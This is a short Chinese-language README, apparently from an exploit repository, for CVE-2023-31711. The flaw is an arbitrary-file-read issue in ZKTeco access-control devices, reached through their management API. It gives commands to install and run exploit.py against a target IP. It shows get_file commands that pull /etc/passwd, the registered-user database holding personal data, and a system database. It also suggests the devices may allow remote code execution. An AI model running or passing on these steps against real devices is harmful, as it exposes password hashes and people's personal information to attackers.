CVE-2023-31711
ZKTECO 中的访问控制不当允许远程攻击者通过管理 API 读取任意文件。
安装所需模块
- 在 ZKTEco 目录中:
$ pip install -r ./pyzatt/requirements_dev.txt
运行漏洞利用
- 在 ZKTEco 目录中:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
示例:
get_file /etc/passwd:泄露 root 密码的哈希
get_file /mnt/mtdblock/data/ZKDB.db:泄露已注册用户的个人身份信息(PII)。要读取内容,你可能需要按顺序多次运行此命令,直到全部内容泄露完毕
get_file /mnt/mtdblock/data/ZKSystem.db:泄露与系统相关的敏感信息
致谢
注意
这些设备也可能通过管理 API 存在远程代码执行漏洞。致谢部分提到的漏洞利用可能是寻找相应测试的好起点。